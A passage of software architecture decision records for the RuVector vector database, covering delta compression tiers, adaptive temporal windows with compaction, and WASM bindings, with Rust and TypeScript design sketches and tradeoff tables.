| Encoding only | 1-10x | 5us | 2us |
| + Float16 | 2-20x | 15us | 8us |
| + Int8 | 4-40x | 20us | 10us |
| + LZ4 | 6-50x | 50us | 20us |
| + Zstd | 8-60x | 200us | 50us |
### Batch Compression (100 deltas)
| Configuration | Ratio | Compress Time | Decompress Time |
|---------------|-------|---------------|-----------------|
| Individual Zstd | 8x | 20ms | 5ms |
| Batch + Dedup | 15x | 5ms | 2ms |
| Batch + Patterns + Zstd | 25x | 8ms | 3ms |
| Batch + Full Pipeline | 40x | 12ms | 4ms |
### Network vs Storage Tradeoffs
| Use Case | Target Ratio | Max Latency | Recommended |
|----------|--------------|-------------|-------------|
| Real-time sync | >3x | <1ms | Encode + LZ4 |
| Batch sync | >10x | <100ms | Batch + Zstd |
| Hot storage | >5x | <10ms | Encode + Zstd |
| Cold storage | >20x | <1s | Full pipeline + Brotli |
| Archive | >50x | N/A | Max compression |
---
## Considered Options
### Option 1: Single Codec (LZ4/Zstd)
**Description**: Apply one compression algorithm to everything.
**Pros**:
- Simple implementation
- Predictable performance
- No decision overhead
**Cons**:
- Suboptimal for varied data
- Misses domain-specific opportunities
- Either too slow or poor ratio
**Verdict**: Rejected - vectors benefit from tiered approach.
### Option 2: Learned Compression
**Description**: ML model learns optimal compression.
**Pros**:
- Potentially optimal compression
- Adapts to data patterns
**Cons**:
- Training complexity
- Inference overhead
- Hard to debug
**Verdict**: Deferred - consider for future version.
### Option 3: Delta-Specific Codecs
**Description**: Custom codec designed for vector deltas.
**Pros**:
- Maximum compression for vectors
- No general overhead
**Cons**:
- Development effort
- Maintenance burden
- Limited reuse
**Verdict**: Partially adopted - value quantization is delta-specific.
### Option 4: Multi-Tier Pipeline (Selected)
**Description**: Layer encoding, quantization, and entropy coding.
**Pros**:
- Each tier optimized for its purpose
- Configurable tradeoffs
- Reuses proven components
**Cons**:
- Configuration complexity
- Multiple code paths
**Verdict**: Adopted - best balance of compression and flexibility.
---
## Technical Specification
### Compression API
```rust
/// Delta compression pipeline
pub struct CompressionPipeline {
/// Encoding configuration
encoding: EncodingConfig,
/// Quantization settings
quantization: QuantizationConfig,
/// Entropy codec
entropy: EntropyCodec,
/// Batch compression (optional)
batch: Option<BatchCompressor>,
}
impl CompressionPipeline {
/// Compress a single delta
pub fn compress(&self, delta: &VectorDelta) -> Result<CompressedDelta> {
// Tier 0: Encoding
let encoded = encode_delta(&delta.operation, &self.encoding);
// Tier 1: Quantization
let quantized = quantize_encoded(&encoded, &self.quantization);
// Tier 2: Entropy coding
let compressed = self.entropy.compress(&quantized.to_bytes())?;
Ok(CompressedDelta {
delta_id: delta.delta_id.clone(),
vector_id: delta.vector_id.clone(),
metadata: compress_metadata(&delta, &self.encoding),
compressed_data: compressed,
original_size: estimated_delta_size(delta),
})
}
/// Decompress a single delta
pub fn decompress(&self, compressed: &CompressedDelta) -> Result<VectorDelta> {
// Reverse: entropy -> quantization -> encoding
let decoded_bytes = self.entropy.decompress(&compressed.compressed_data)?;
let dequantized = dequantize(&decoded_bytes, &self.quantization);
let operation = decode_delta(&dequantized, &self.encoding)?;
Ok(VectorDelta {
delta_id: compressed.delta_id.clone(),
vector_id: compressed.vector_id.clone(),
operation,
..decompress_metadata(&compressed.metadata)?
})
}
/// Compress batch of deltas
pub fn compress_batch(&self, deltas: &[VectorDelta]) -> Result<CompressedBatch> {
match &self.batch {
Some(batch_compressor) => batch_compressor.compress_batch(deltas),
None => {
// Fall back to individual compression
let compressed: Vec<_> = deltas.iter()
.map(|d| self.compress(d))
.collect::<Result<_>>()?;
Ok(CompressedBatch::from_individuals(compressed))
}
}
}
}
```
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CompressionConfig {
/// Enable/disable tiers
pub enable_quantization: bool,
pub enable_entropy: bool,
pub enable_batch: bool,
/// Quantization settings
pub quantization: QuantizationConfig,
/// Entropy codec selection
pub entropy_codec: EntropyCodec,
/// Batch compression settings
pub batch_config: BatchCompressionConfig,
/// Compression level presets
pub preset: CompressionPreset,
}
#[derive(Debug, Clone, Copy, Serialize, Deserialize)]
pub enum CompressionPreset {
/// Minimize latency
Fastest,
/// Balance speed and ratio
Balanced,
/// Maximize compression
Maximum,
/// Custom configuration
Custom,
}
impl Default for CompressionConfig {
fn default() -> Self {
Self {
enable_quantization: true,
enable_entropy: true,
enable_batch: true,
quantization: QuantizationConfig::default(),
entropy_codec: EntropyCodec::Zstd { level: 3 },
batch_config: BatchCompressionConfig::default(),
preset: CompressionPreset::Balanced,
}
}
}
```
---
## Consequences
### Benefits
1. **High Compression**: 5-50x reduction in storage and network
2. **Configurable**: Choose speed vs ratio tradeoff
3. **Adaptive**: Automatic format selection
4. **Streaming**: Works with real-time delta flows
5. **WASM Compatible**: All codecs work in browser
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Compression overhead | Medium | Medium | Fast path for small deltas |
| Quality loss | Low | High | Lossless option always available |
| Codec incompatibility | Low | Medium | Version headers, fallback |
| Memory pressure | Medium | Medium | Streaming decompression |
---
## References
1. Lemire, D., & Boytsov, L. "Decoding billions of integers per second through vectorization."
2. LZ4 Frame Format. https://github.com/lz4/lz4/blob/dev/doc/lz4_Frame_format.md
3. Zstandard Compression. https://facebook.github.io/zstd/
4. ADR-DB-002: Delta Encoding Format
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-002**: Delta Encoding Format
- **ADR-DB-003**: Delta Propagation Protocol

View File

@@ -0,0 +1,789 @@
# ADR-DB-007: Delta Temporal Windows
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Windowing Challenge
Delta streams require intelligent batching and aggregation:
1. **Write Amplification**: Processing individual deltas is inefficient
2. **Network Efficiency**: Batching reduces per-message overhead
3. **Memory Pressure**: Unbounded buffering causes OOM
4. **Latency Requirements**: Different use cases have different freshness needs
5. **Compaction**: Old deltas should be merged to save space
### Window Types
| Type | Description | Use Case |
|------|-------------|----------|
| Fixed | Consistent time intervals | Batch processing |
| Sliding | Overlapping windows | Moving averages |
| Session | Activity-based | User sessions |
| Tumbling | Non-overlapping fixed | Checkpointing |
| Adaptive | Dynamic sizing | Variable load |
---
## Decision
### Adopt Adaptive Windows with Compaction
We implement an adaptive windowing system that dynamically adjusts based on load and compacts old deltas.
### Architecture Overview
```
┌─────────────────────────────────────────────────────────────┐
│ DELTA TEMPORAL MANAGER │
└─────────────────────────────────────────────────────────────┘
┌──────────────────────────┼──────────────────────────────────┐
│ │ │
v v v
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Ingestion │ │ Window │ │ Compaction │
│ Buffer │─────────>│ Processor │─────────────────>│ Engine │
└───────────────┘ └───────────────┘ └───────────────┘
│ │ │
v v v
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Rate Monitor │ │ Emitter │ │ Checkpoint │
│ │ │ │ │ Creator │
└───────────────┘ └───────────────┘ └───────────────┘
INGESTION PROCESSING STORAGE
```
### Core Components
#### 1. Adaptive Window Manager
```rust
/// Adaptive window that adjusts size based on load
pub struct AdaptiveWindowManager {
/// Current window configuration
current_config: RwLock<WindowConfig>,
/// Ingestion buffer
buffer: SegQueue<BufferedDelta>,
/// Buffer size counter
buffer_size: AtomicUsize,
/// Rate monitor
rate_monitor: RateMonitor,
/// Window emitter
emitter: WindowEmitter,
/// Configuration bounds
bounds: WindowBounds,
}
#[derive(Debug, Clone)]
pub struct WindowConfig {
/// Window type
pub window_type: WindowType,
/// Current window duration
pub duration: Duration,
/// Maximum buffer size
pub max_size: usize,
/// Trigger conditions
pub triggers: Vec<WindowTrigger>,
}
#[derive(Debug, Clone, Copy)]
pub enum WindowType {
/// Fixed time interval
Fixed { interval: Duration },
/// Sliding window with step
Sliding { size: Duration, step: Duration },
/// Session-based (gap timeout)
Session { gap_timeout: Duration },
/// Non-overlapping fixed
Tumbling { size: Duration },
/// Dynamic sizing
Adaptive {
min_duration: Duration,
max_duration: Duration,
target_batch_size: usize,
},
}
#[derive(Debug, Clone)]
pub enum WindowTrigger {
/// Time-based trigger
Time { interval: Duration },
/// Count-based trigger
Count { threshold: usize },
/// Size-based trigger (bytes)
Size { threshold: usize },
/// Rate change trigger
RateChange { threshold: f32 },
/// Memory pressure trigger
MemoryPressure { threshold: f32 },
}
impl AdaptiveWindowManager {
/// Add delta to current window
pub fn add_delta(&self, delta: VectorDelta) -> Result<()> {
let buffered = BufferedDelta {
delta,
buffered_at: Instant::now(),
};
self.buffer.push(buffered);
let new_size = self.buffer_size.fetch_add(1, Ordering::Relaxed) + 1;
// Check if we should trigger window
if self.should_trigger(new_size) {
self.trigger_window().await?;
}
Ok(())
}
/// Check trigger conditions
fn should_trigger(&self, buffer_size: usize) -> bool {
let config = self.current_config.read().unwrap();
for trigger in &config.triggers {
match trigger {
WindowTrigger::Count { threshold } => {
if buffer_size >= *threshold {
return true;
}
}
WindowTrigger::MemoryPressure { threshold } => {
if self.get_memory_pressure() >= *threshold {
return true;
}
}
// Other triggers checked by background task
_ => {}
}
}
false
}
/// Trigger window emission
async fn trigger_window(&self) -> Result<()> {
// Drain buffer
let mut deltas = Vec::new();
while let Some(buffered) = self.buffer.pop() {
deltas.push(buffered);
}
self.buffer_size.store(0, Ordering::Relaxed);
// Emit window
self.emitter.emit(WindowedDeltas {
deltas,
window_start: Instant::now(), // Would be first delta timestamp
window_end: Instant::now(),
trigger_reason: WindowTriggerReason::Explicit,
}).await?;
// Adapt window size based on metrics
self.adapt_window_size();
Ok(())
}
/// Adapt window size based on load
fn adapt_window_size(&self) {
let rate = self.rate_monitor.current_rate();
let mut config = self.current_config.write().unwrap();
if let WindowType::Adaptive { min_duration, max_duration, target_batch_size } = &config.window_type {
// Calculate optimal duration for target batch size
let optimal_duration = if rate > 0.0 {
Duration::from_secs_f64(*target_batch_size as f64 / rate)
} else {
*max_duration
};
// Clamp to bounds
config.duration = optimal_duration.clamp(*min_duration, *max_duration);
// Update time trigger
for trigger in &mut config.triggers {
if let WindowTrigger::Time { interval } = trigger {
*interval = config.duration;
}
}
}
}
}
```
#### 2. Rate Monitor
```rust
/// Monitors delta ingestion rate
pub struct RateMonitor {
/// Sliding window of counts
counts: VecDeque<(Instant, u64)>,
/// Window duration for rate calculation
window: Duration,
/// Current rate estimate
current_rate: AtomicF64,
/// Rate change detection
rate_history: VecDeque<f64>,
}
impl RateMonitor {
/// Record delta arrival
pub fn record(&self, count: u64) {
let now = Instant::now();
// Add new count
self.counts.push_back((now, count));
// Remove old entries
let cutoff = now - self.window;
while let Some((t, _)) = self.counts.front() {
if *t < cutoff {
self.counts.pop_front();
} else {
break;
}
}
// Calculate current rate
let total: u64 = self.counts.iter().map(|(_, c)| c).sum();
let duration = self.counts.back()
.map(|(t, _)| t.duration_since(self.counts.front().unwrap().0))
.unwrap_or(Duration::from_secs(1));
let rate = total as f64 / duration.as_secs_f64().max(0.001);
self.current_rate.store(rate, Ordering::Relaxed);
// Track rate history for change detection
self.rate_history.push_back(rate);
if self.rate_history.len() > 100 {
self.rate_history.pop_front();
}
}
/// Get current rate (deltas per second)
pub fn current_rate(&self) -> f64 {
self.current_rate.load(Ordering::Relaxed)
}
/// Detect significant rate change
pub fn rate_change_detected(&self, threshold: f32) -> bool {
if self.rate_history.len() < 10 {
return false;
}
let recent: Vec<_> = self.rate_history.iter().rev().take(5).collect();
let older: Vec<_> = self.rate_history.iter().rev().skip(5).take(10).collect();
let recent_avg = recent.iter().copied().sum::<f64>() / recent.len() as f64;
let older_avg = older.iter().copied().sum::<f64>() / older.len().max(1) as f64;
let change = (recent_avg - older_avg).abs() / older_avg.max(1.0);
change > threshold as f64
}
}
```
#### 3. Compaction Engine
```rust
/// Compacts delta chains to reduce storage
pub struct CompactionEngine {
/// Compaction configuration
config: CompactionConfig,
/// Active compaction tasks
tasks: DashMap<VectorId, CompactionTask>,
/// Compaction metrics
metrics: CompactionMetrics,
}
#[derive(Debug, Clone)]
pub struct CompactionConfig {
/// Trigger compaction after N deltas
pub delta_threshold: usize,
/// Trigger compaction after duration
pub time_threshold: Duration,
/// Maximum chain length before forced compaction
pub max_chain_length: usize,
/// Compaction strategy
pub strategy: CompactionStrategy,
/// Background compaction enabled
pub background: bool,
}
#[derive(Debug, Clone, Copy)]
pub enum CompactionStrategy {
/// Merge all deltas into single checkpoint
FullMerge,
/// Keep recent deltas, merge older
TieredMerge { keep_recent: usize },
/// Keep deltas at time boundaries
TimeBoundary { interval: Duration },
/// Adaptive based on access patterns
Adaptive,
}
impl CompactionEngine {
/// Check if vector needs compaction
pub fn needs_compaction(&self, chain: &DeltaChain) -> bool {
// Delta count threshold
if chain.pending_deltas.len() >= self.config.delta_threshold {
return true;
}
// Time threshold
if let Some(first) = chain.pending_deltas.first() {
if first.timestamp.elapsed() > self.config.time_threshold {
return true;
}
}
// Chain length threshold
if chain.pending_deltas.len() >= self.config.max_chain_length {
return true;
}
false
}
/// Compact a delta chain
pub async fn compact(&self, chain: &mut DeltaChain) -> Result<CompactionResult> {
match self.config.strategy {
CompactionStrategy::FullMerge => {
self.full_merge(chain).await
}
CompactionStrategy::TieredMerge { keep_recent } => {
self.tiered_merge(chain, keep_recent).await
}
CompactionStrategy::TimeBoundary { interval } => {
self.time_boundary_merge(chain, interval).await
}
CompactionStrategy::Adaptive => {
self.adaptive_merge(chain).await
}
}
}
/// Full merge: create checkpoint from all deltas
async fn full_merge(&self, chain: &mut DeltaChain) -> Result<CompactionResult> {
// Compose current vector
let current_vector = chain.compose()?;
// Create new checkpoint
let checkpoint = Checkpoint {
vector: current_vector,
at_delta: chain.pending_deltas.last()
.map(|d| d.delta_id.clone())
.unwrap_or_default(),
timestamp: Utc::now(),
delta_count: chain.pending_deltas.len() as u64,
};
let merged_count = chain.pending_deltas.len();
// Clear deltas, set checkpoint
chain.pending_deltas.clear();
chain.checkpoint = Some(checkpoint);
Ok(CompactionResult {
deltas_merged: merged_count,
space_saved: estimate_space_saved(merged_count),
strategy: CompactionStrategy::FullMerge,
})
}
/// Tiered merge: keep recent, merge older
async fn tiered_merge(
&self,
chain: &mut DeltaChain,
keep_recent: usize,
) -> Result<CompactionResult> {
if chain.pending_deltas.len() <= keep_recent {
return Ok(CompactionResult::no_op());
}
// Split into old and recent
let split_point = chain.pending_deltas.len() - keep_recent;
let old_deltas: Vec<_> = chain.pending_deltas.drain(..split_point).collect();
// Compose checkpoint from old deltas
let mut checkpoint_vector = chain.checkpoint
.as_ref()
.map(|c| c.vector.clone())
.unwrap_or_else(|| vec![0.0; chain.dimensions()]);
for delta in &old_deltas {
chain.apply_operation(&mut checkpoint_vector, &delta.operation)?;
}
// Update checkpoint
chain.checkpoint = Some(Checkpoint {
vector: checkpoint_vector,
at_delta: old_deltas.last().unwrap().delta_id.clone(),
timestamp: Utc::now(),
delta_count: old_deltas.len() as u64,
});
Ok(CompactionResult {
deltas_merged: old_deltas.len(),
space_saved: estimate_space_saved(old_deltas.len()),
strategy: CompactionStrategy::TieredMerge { keep_recent },
})
}
/// Time boundary merge: keep deltas at boundaries
async fn time_boundary_merge(
&self,
chain: &mut DeltaChain,
interval: Duration,
) -> Result<CompactionResult> {
let now = Utc::now();
let mut kept = Vec::new();
let mut merged_count = 0;
// Group by time boundaries
let mut groups: HashMap<i64, Vec<&VectorDelta>> = HashMap::new();
for delta in &chain.pending_deltas {
let boundary = delta.timestamp.timestamp() / interval.as_secs() as i64;
groups.entry(boundary).or_default().push(delta);
}
// Keep one delta per boundary
for (_boundary, deltas) in groups {
kept.push(deltas.last().unwrap().clone());
merged_count += deltas.len() - 1;
}
chain.pending_deltas = kept;
Ok(CompactionResult {
deltas_merged: merged_count,
space_saved: estimate_space_saved(merged_count),
strategy: CompactionStrategy::TimeBoundary { interval },
})
}
}
```
### Window Processing Pipeline
```
Delta Stream
v
┌────────────────────────────────────────────────────────────────────────────┐
│ WINDOW PROCESSOR │
│ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ Buffer │───>│ Window │───>│ Aggregate │───>│ Emit │ │
│ │ │ │ Detect │ │ │ │ │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │ │ │ │ │
│ v v v v │
│ Time Trigger Size Trigger Merge Deltas Batch Output │
│ Count Trigger Rate Trigger Deduplicate Compress │
│ Memory Trigger Custom Trigger Sort by Time Propagate │
│ │
└───────────────────────────────────────────────────────────────────────────┘
v
┌───────────────────────────────────┐
│ Window Output │
│ - Batched deltas │
│ - Window metadata │
│ - Aggregation stats │
└───────────────────────────────────┘
```
---
## Memory Bounds
### Buffer Memory Management
```rust
/// Memory-bounded buffer configuration
pub struct MemoryBoundsConfig {
/// Maximum buffer memory (bytes)
pub max_memory: usize,
/// High water mark for warning
pub high_water_mark: f32,
/// Emergency flush threshold
pub emergency_threshold: f32,
}
impl Default for MemoryBoundsConfig {
fn default() -> Self {
Self {
max_memory: 100 * 1024 * 1024, // 100MB
high_water_mark: 0.8,
emergency_threshold: 0.95,
}
}
}
/// Memory tracking for window buffers
pub struct MemoryTracker {
/// Current usage
current: AtomicUsize,
/// Configuration
config: MemoryBoundsConfig,
}
impl MemoryTracker {
/// Track memory allocation
pub fn allocate(&self, bytes: usize) -> Result<MemoryGuard, MemoryPressure> {
let current = self.current.fetch_add(bytes, Ordering::Relaxed);
let new_total = current + bytes;
let usage_ratio = new_total as f32 / self.config.max_memory as f32;
if usage_ratio > self.config.emergency_threshold {
// Rollback and fail
self.current.fetch_sub(bytes, Ordering::Relaxed);
return Err(MemoryPressure::Emergency);
}
if usage_ratio > self.config.high_water_mark {
return Err(MemoryPressure::Warning);
}
Ok(MemoryGuard {
tracker: self,
bytes,
})
}
/// Get current pressure level
pub fn pressure_level(&self) -> MemoryPressureLevel {
let ratio = self.current.load(Ordering::Relaxed) as f32
/ self.config.max_memory as f32;
if ratio > self.config.emergency_threshold {
MemoryPressureLevel::Emergency
} else if ratio > self.config.high_water_mark {
MemoryPressureLevel::High
} else if ratio > 0.5 {
MemoryPressureLevel::Medium
} else {
MemoryPressureLevel::Low
}
}
}
```
### Memory Budget by Component
| Component | Default Budget | Scaling |
|-----------|----------------|---------|
| Ingestion buffer | 50MB | Per shard |
| Rate monitor | 1MB | Fixed |
| Compaction tasks | 20MB | Per active chain |
| Window metadata | 5MB | Per window |
| **Total** | **~100MB** | Per instance |
---
## Considered Options
### Option 1: Fixed Windows Only
**Description**: Simple fixed-interval windows.
**Pros**:
- Simple implementation
- Predictable behavior
- Easy debugging
**Cons**:
- Inefficient for variable load
- May batch too few or too many
- No load adaptation
**Verdict**: Available as configuration, not default.
### Option 2: Count-Based Batching
**Description**: Emit after N deltas.
**Pros**:
- Consistent batch sizes
- Predictable memory
**Cons**:
- Variable latency
- May hold deltas too long at low load
- No time bounds
**Verdict**: Available as trigger, combined with time.
### Option 3: Session Windows
**Description**: Window based on activity gaps.
**Pros**:
- Natural for user interactions
- Adapts to activity patterns
**Cons**:
- Unpredictable timing
- Complex to implement correctly
- Memory pressure with long sessions
**Verdict**: Available for specific use cases.
### Option 4: Adaptive Windows (Selected)
**Description**: Dynamic sizing based on load and memory.
**Pros**:
- Optimal batch sizes
- Respects memory bounds
- Adapts to load changes
- Multiple trigger types
**Cons**:
- More complex
- Requires tuning
- Less predictable
**Verdict**: Adopted - best for varying delta workloads.
---
## Technical Specification
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TemporalConfig {
/// Window type and parameters
pub window_type: WindowType,
/// Memory bounds
pub memory_bounds: MemoryBoundsConfig,
/// Compaction configuration
pub compaction: CompactionConfig,
/// Background task interval
pub background_interval: Duration,
/// Late data handling
pub late_data: LateDataPolicy,
}
#[derive(Debug, Clone, Copy, Serialize, Deserialize)]
pub enum LateDataPolicy {
/// Discard late data
Discard,
/// Include in next window
NextWindow,
/// Reemit updated window
Reemit { max_lateness: Duration },
}
impl Default for TemporalConfig {
fn default() -> Self {
Self {
window_type: WindowType::Adaptive {
min_duration: Duration::from_millis(10),
max_duration: Duration::from_secs(5),
target_batch_size: 100,
},
memory_bounds: MemoryBoundsConfig::default(),
compaction: CompactionConfig {
delta_threshold: 100,
time_threshold: Duration::from_secs(60),
max_chain_length: 1000,
strategy: CompactionStrategy::TieredMerge { keep_recent: 10 },
background: true,
},
background_interval: Duration::from_millis(100),
late_data: LateDataPolicy::NextWindow,
}
}
}
```
### Window Output Format
```rust
#[derive(Debug, Clone)]
pub struct WindowOutput {
/// Window identifier
pub window_id: WindowId,
/// Start timestamp
pub start: DateTime<Utc>,
/// End timestamp
pub end: DateTime<Utc>,
/// Deltas in window
pub deltas: Vec<VectorDelta>,
/// Window statistics
pub stats: WindowStats,
/// Trigger reason
pub trigger: WindowTriggerReason,
}
#[derive(Debug, Clone)]
pub struct WindowStats {
/// Number of deltas
pub delta_count: usize,
/// Unique vectors affected
pub vectors_affected: usize,
/// Total bytes
pub total_bytes: usize,
/// Average delta size
pub avg_delta_size: f32,
/// Window duration
pub duration: Duration,
}
```
---
## Consequences
### Benefits
1. **Efficient Batching**: Optimal batch sizes for varying load
2. **Memory Safety**: Bounded memory usage
3. **Adaptive**: Responds to load changes
4. **Compaction**: Reduces long-term storage
5. **Flexible**: Multiple window types and triggers
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Over-batching | Medium | Low | Multiple triggers |
| Under-batching | Medium | Medium | Count-based fallback |
| Memory spikes | Low | High | Emergency flush |
| Data loss | Low | High | WAL before windowing |
---
## References
1. Akidau, T., et al. "The Dataflow Model: A Practical Approach to Balancing Correctness, Latency, and Cost in Massive-Scale, Unbounded, Out-of-Order Data Processing."
2. Carbone, P., et al. "State Management in Apache Flink."
3. ADR-DB-001: Delta Behavior Core Architecture
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-003**: Delta Propagation Protocol
- **ADR-DB-006**: Delta Compression Strategy

View File

@@ -0,0 +1,679 @@
# ADR-DB-008: Delta WASM Integration
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The WASM Boundary Challenge
Delta-behavior must work seamlessly across WASM module boundaries:
1. **Data Sharing**: Efficient delta transfer between host and WASM
2. **Memory Management**: WASM linear memory constraints
3. **API Design**: JavaScript-friendly interfaces
4. **Performance**: Minimize serialization overhead
5. **Streaming**: Support for real-time delta streams
### Ruvector WASM Architecture
Current ruvector WASM bindings (ADR-001) use:
- `wasm-bindgen` for JavaScript interop
- Memory-only storage (`storage_memory.rs`)
- Full vector copies across boundary
### WASM Constraints
| Constraint | Impact |
|------------|--------|
| Linear memory | Single contiguous address space |
| No threads | No parallel processing (without Atomics) |
| No filesystem | Memory-only persistence |
| Serialization cost | Every cross-boundary call |
| 32-bit pointers | 4GB address limit |
---
## Decision
### Adopt Component Model with Shared Memory
We implement delta WASM integration using the emerging WebAssembly Component Model with optimized shared memory patterns.
### Architecture Overview
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ JAVASCRIPT HOST │
│ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────────────────┐ │
│ │ Delta API │ │ Event Stream │ │ TypedArray Views │ │
│ │ (High-level) │ │ (Callbacks) │ │ (Zero-copy access) │ │
│ └────────┬────────┘ └────────┬────────┘ └─────────────┬───────────────┘ │
│ │ │ │ │
└───────────┼────────────────────┼─────────────────────────┼──────────────────┘
│ │ │
v v v
┌───────────────────────────────────────────────────────────────────────────────┐
│ WASM BINDING LAYER │
│ │
│ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────────────────┐│
│ │ wasm-bindgen │ │ EventEmitter │ │ SharedArrayBuffer Bridge ││
│ │ Interface │ │ Integration │ │ (when available) ││
│ └────────┬─────────┘ └────────┬─────────┘ └─────────────┬────────────────┘│
│ │ │ │ │
└───────────┼─────────────────────┼──────────────────────────┼─────────────────┘
│ │ │
v v v
┌───────────────────────────────────────────────────────────────────────────────┐
│ RUVECTOR DELTA CORE (WASM) │
│ │
│ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────────────────┐│
│ │ Delta Manager │ │ Delta Stream │ │ Shared Memory Pool ││
│ │ │ │ Processor │ │ ││
│ └──────────────────┘ └──────────────────┘ └──────────────────────────────┘│
│ │
└───────────────────────────────────────────────────────────────────────────────┘
```
### Interface Contracts
#### TypeScript/JavaScript API
```typescript
/**
* Delta-aware vector database for WASM environments
*/
export class DeltaVectorDB {
/**
* Create a new delta-aware vector database
*/
constructor(options: DeltaDBOptions);
/**
* Apply a delta to a vector
* @returns Delta ID
*/
applyDelta(delta: VectorDelta): string;
/**
* Apply multiple deltas efficiently (batch)
* @returns Array of Delta IDs
*/
applyDeltas(deltas: VectorDelta[]): string[];
/**
* Get current vector (composed from delta chain)
* @returns Float32Array or null if not found
*/
getVector(id: string): Float32Array | null;
/**
* Get vector at specific time
*/
getVectorAt(id: string, timestamp: Date): Float32Array | null;
/**
* Subscribe to delta stream
*/
onDelta(callback: (delta: VectorDelta) => void): () => void;
/**
* Search with delta-aware semantics
*/
search(query: Float32Array, k: number): SearchResult[];
/**
* Get delta chain for debugging/inspection
*/
getDeltaChain(id: string): DeltaChain;
/**
* Compact delta chains
*/
compact(options?: CompactOptions): CompactionStats;
/**
* Export state for persistence (IndexedDB, etc.)
*/
export(): Uint8Array;
/**
* Import previously exported state
*/
import(data: Uint8Array): void;
}
/**
* Delta operation types
*/
export interface VectorDelta {
/** Target vector ID */
vectorId: string;
/** Delta operation */
operation: DeltaOperation;
/** Optional metadata changes */
metadata?: Record<string, unknown>;
/** Timestamp (auto-generated if not provided) */
timestamp?: Date;
}
export type DeltaOperation =
| { type: 'create'; vector: Float32Array }
| { type: 'sparse'; indices: Uint32Array; values: Float32Array }
| { type: 'dense'; vector: Float32Array }
| { type: 'scale'; factor: number }
| { type: 'offset'; amount: number }
| { type: 'delete' };
```
#### Rust WASM Bindings
```rust
use wasm_bindgen::prelude::*;
use js_sys::{Float32Array, Uint32Array, Uint8Array, Function};
/// Delta-aware vector database for WASM
#[wasm_bindgen]
pub struct DeltaVectorDB {
inner: WasmDeltaManager,
event_listeners: Vec<Function>,
}
#[wasm_bindgen]
impl DeltaVectorDB {
/// Create new database
#[wasm_bindgen(constructor)]
pub fn new(options: JsValue) -> Result<DeltaVectorDB, JsError> {
let config: DeltaDBOptions = serde_wasm_bindgen::from_value(options)?;
Ok(Self {
inner: WasmDeltaManager::new(config)?,
event_listeners: Vec::new(),
})
}
/// Apply a delta operation
#[wasm_bindgen(js_name = applyDelta)]
pub fn apply_delta(&mut self, delta: JsValue) -> Result<String, JsError> {
let delta: VectorDelta = serde_wasm_bindgen::from_value(delta)?;
let delta_id = self.inner.apply_delta(delta)?;
// Emit to listeners
self.emit_delta_event(&delta_id);
Ok(delta_id.to_string())
}
/// Apply batch of deltas efficiently
#[wasm_bindgen(js_name = applyDeltas)]
pub fn apply_deltas(&mut self, deltas: JsValue) -> Result<JsValue, JsError> {
let deltas: Vec<VectorDelta> = serde_wasm_bindgen::from_value(deltas)?;
let ids = self.inner.apply_deltas(deltas)?;
Ok(serde_wasm_bindgen::to_value(&ids)?)
}
/// Get current vector as Float32Array
#[wasm_bindgen(js_name = getVector)]
pub fn get_vector(&self, id: &str) -> Option<Float32Array> {
self.inner.get_vector(id)
.map(|v| {
let array = Float32Array::new_with_length(v.len() as u32);
array.copy_from(&v);
array
})
}
/// Search for nearest neighbors
#[wasm_bindgen(js_name = search)]
pub fn search(&self, query: Float32Array, k: u32) -> Result<JsValue, JsError> {
let query_vec: Vec<f32> = query.to_vec();
let results = self.inner.search(&query_vec, k as usize)?;
Ok(serde_wasm_bindgen::to_value(&results)?)
}
/// Subscribe to delta events
#[wasm_bindgen(js_name = onDelta)]
pub fn on_delta(&mut self, callback: Function) -> usize {
let index = self.event_listeners.len();
self.event_listeners.push(callback);
index
}
/// Export state for persistence
#[wasm_bindgen(js_name = export)]
pub fn export(&self) -> Result<Uint8Array, JsError> {
let bytes = self.inner.export()?;
let array = Uint8Array::new_with_length(bytes.len() as u32);
array.copy_from(&bytes);
Ok(array)
}
/// Import previously exported state
#[wasm_bindgen(js_name = import)]
pub fn import(&mut self, data: Uint8Array) -> Result<(), JsError> {
let bytes = data.to_vec();
self.inner.import(&bytes)?;
Ok(())
}
}
```
### Shared Memory Pattern
For high-throughput scenarios, we use a shared memory pool:
```rust
/// Shared memory pool for zero-copy delta transfer
#[wasm_bindgen]
pub struct SharedDeltaPool {
/// Preallocated buffer for deltas
buffer: Vec<u8>,
/// Write position
write_pos: usize,
/// Read position
read_pos: usize,
/// Capacity
capacity: usize,
}
#[wasm_bindgen]
impl SharedDeltaPool {
#[wasm_bindgen(constructor)]
pub fn new(capacity: usize) -> Self {
Self {
buffer: vec![0u8; capacity],
write_pos: 0,
read_pos: 0,
capacity,
}
}
/// Get buffer pointer for direct JS access
#[wasm_bindgen(js_name = getBufferPtr)]
pub fn get_buffer_ptr(&self) -> *const u8 {
self.buffer.as_ptr()
}
/// Get buffer length
#[wasm_bindgen(js_name = getBufferLen)]
pub fn get_buffer_len(&self) -> usize {
self.capacity
}
/// Write delta to shared buffer
